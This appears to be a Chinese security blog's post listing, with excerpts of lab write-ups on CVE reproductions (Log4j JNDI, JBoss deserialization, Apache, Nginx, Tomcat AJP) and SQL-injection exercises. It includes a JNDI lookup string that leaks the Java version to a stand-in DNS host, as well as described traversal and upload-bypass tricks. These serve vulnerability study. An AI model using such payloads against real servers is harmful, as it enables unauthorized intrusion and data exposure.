- 博客(22)
- 收藏
- 关注
原创 php反序列化漏洞典型例题
ctfhub-技能树-pklovecloud引用题目:2021-第五空间智能安全大赛-Web-pklovecloud。
2024-10-28 19:49:52 964 1
原创 burpsuite-app抓包-绕过安卓高版本限制
使用bp抓包app,可以使用bp自带证书,但是安卓只支持cer后缀,所以要将下载的证书后缀der改为cer,然后在模拟器中导入证书。但是安卓7及以上版本默认是不信任用户自己安装的证书的,所以我们要将自己的bp证书添加到模拟器的system系统分区。
2024-10-23 12:50:56 288
原创 sqli-labs-master靶场11~20关
sql注入靶场sqli-labs的11~20关。判断注入点类型、字段数,使用union联合注入、布尔注入、延时盲注以及报错盲注。
2024-09-29 18:38:51 573
原创 sqli-labs-master靶场1~10关
sql注入靶场sqli-labs的1~10关。判断注入点类型、字段数,使用union联合注入、布尔盲注以及延时盲注。
2024-09-28 18:07:21 794
原创 log4j JNDI注入漏洞复现 CVE-2021-44228
{sys:java.version}.example.com,而又会解析到sys协议,获取到java.version参数,然后将这个参数值作为子域名的一部分去访问子域名。会通过jndi的lookup()解析dns://${sys:java.version}.example.com,解析到dns协议,会去访问。log4j提供了${}解析功能,当遇到${}时,会通过JNDI的lookup()解析其中的内容。如${jndi:dns://${sys:java.version}.example.com}
2024-09-12 14:33:31 394
原创 JBoss反序列化漏洞复现 CVE-2017-12149
该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。由于Runtime.getRuntime().exec()不能使用管道符等bash需要的方法,因此我们对这个bash命令进行base64编码,再让bash输出base64解码后的命令。该漏洞出现在`/invoker/readonly`请求中,服务器将用户提交的POST内容进行了Java反序列化。生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可。
2024-09-11 21:55:35 425
原创 JBoss反序列化漏洞复现 CVE-2017-7504
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。进入vulnhub目录下的jboss目录,进入CVE-2017-7504目录。访问靶机的8080端口。出现如下即为开启成功!
2024-09-11 21:10:38 318
原创 Apache解析漏洞 CVE-2017-15715
进入vulnhub目录下的httpd目录,进入CVE-2017-15715目录。Apache禁止上传php文件,但是可以添加%0A换行符进行绕过。使用burpsuite抓包后改后缀为.php%0A。Apache是世界使用率排名第一的web服务器。上传成功后又会被Apache当作php文件解析。访问靶机的8080端口。出现如下即为开启成功!docker-compoe启动漏洞环境。直接上传.php文件会被拦截。上传一个后缀为phpa的文件。上传成功并且成功被解析!
2024-09-10 21:17:28 227
原创 Apache目录穿越漏洞复现 CVE-2021-41773
在 Apache HTTP Server 2.4.49 版本中,在对用户发送的请求中的路径参数进行规范化时,其使用的。(3)%2e%2e/ 解码为../但检测指针已经移到了/,故也没有检测到存在../当读取到一个%时,若其后两个字符为十六进制,会将其后两个字符进行url解码。(2).%2e/ 此时%2e解码为.继续判断后面为.没有检测到存在../(1)%2e./ 此时%2e解码为.得到../被检测到存在../即可成功绕过对../的检测,访问到网站目录外的目录。访问靶机的8090端口。
2024-09-10 20:40:11 333
原创 Nginx解析漏洞复现 CVE-2013-4547
正常情况下只有.php后缀的文件才会交给fastcgi解析,但是1.gif%20%00.php也满足了.php后缀,会被Nginx交给fastcgi解析,但是Nginx会识别%00截断符,因此会将1.gif当作是要解析的文件而交给fastcgi解析。因此我们上传一个1.gif文件,然后访问1.gif%20%00.php文件即可执行1.gif中的php代码。进入vulnhub目录下的nginx目录,进入CVE-2013-4547目录。访问靶机的8080端口。成功解析到1.gif的php代码如下!
2024-09-09 22:37:36 462
原创 Nginx整数溢出漏洞复现 CVE-2017-7529
而我们构造http请求包头部中的range字段,选择start和end值让Nginx返回给我们指定位置的文件数据。如我们设置start和end为负值,则会返回Http响应包体的负数位置的文件数据给我们,也就是文件头和Http响应包头,这样我们就可以得到一些敏感信息如服务器的真实ip等。Nginx在进行反向代理时,会将一些静态文件进行缓存,缓存文件包括“文件头”+“Http响应包头”+“Http响应包体”,当再次请求这些文件时,Nginx会直接将缓存文件的Http响应包体返回给我们。访问靶机的8080端口。
2024-09-09 21:24:42 559
原创 Apache RCE漏洞复现 CVE-2021-25646
Apache Druid 是一种开源的分布式实时分析(OLAP)数据库,能够快速地处理海量的数据,并支持在线聚合和深度查询。Apache Http Server是Apache软件基金会的一个开放源码的网页服务器。Alibaba Druid 是由阿里巴巴开源的一款分布式实时大数据查询和分析系统。进入vulnhub目录下的tomcat目录,进入CVE-2021-25646目录。出现Apache Druid界面即为开启成功!攻击者通过构造数据包中的json串来控制一些敏感参数。whoami执行成功!
2024-09-09 16:20:50 351
原创 Tomcat文件读取漏洞复现 CVE-2020-1938
AJP连接器可以通过AJP协议和另一个web容器进行交互。AJP Connector监听8009端口,负责与其它web容器进行连接如Apache。可以让Tomcat处理jsp和servlet,让Apache处理其它请求,有效提高性能。进入vulnhub目录下的tomcat目录,进入CVE-2020-1938目录。AJP协议存在漏洞,导致我们可以读取到webapp下的任意文件。访问靶机的8080端口。读取webapp下的WEB-INF/web.xml。发现8009端口开放,存在ajp协议。
2024-09-09 13:17:32 723
原创 外网主机通过msf和内网跳板机访问内网不出网的主机
获得内网的一台可出网主机的权限后,外网主机通过msf,以该主机为代理访问内网另一台不出网的主机
2024-09-01 20:46:41 321
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人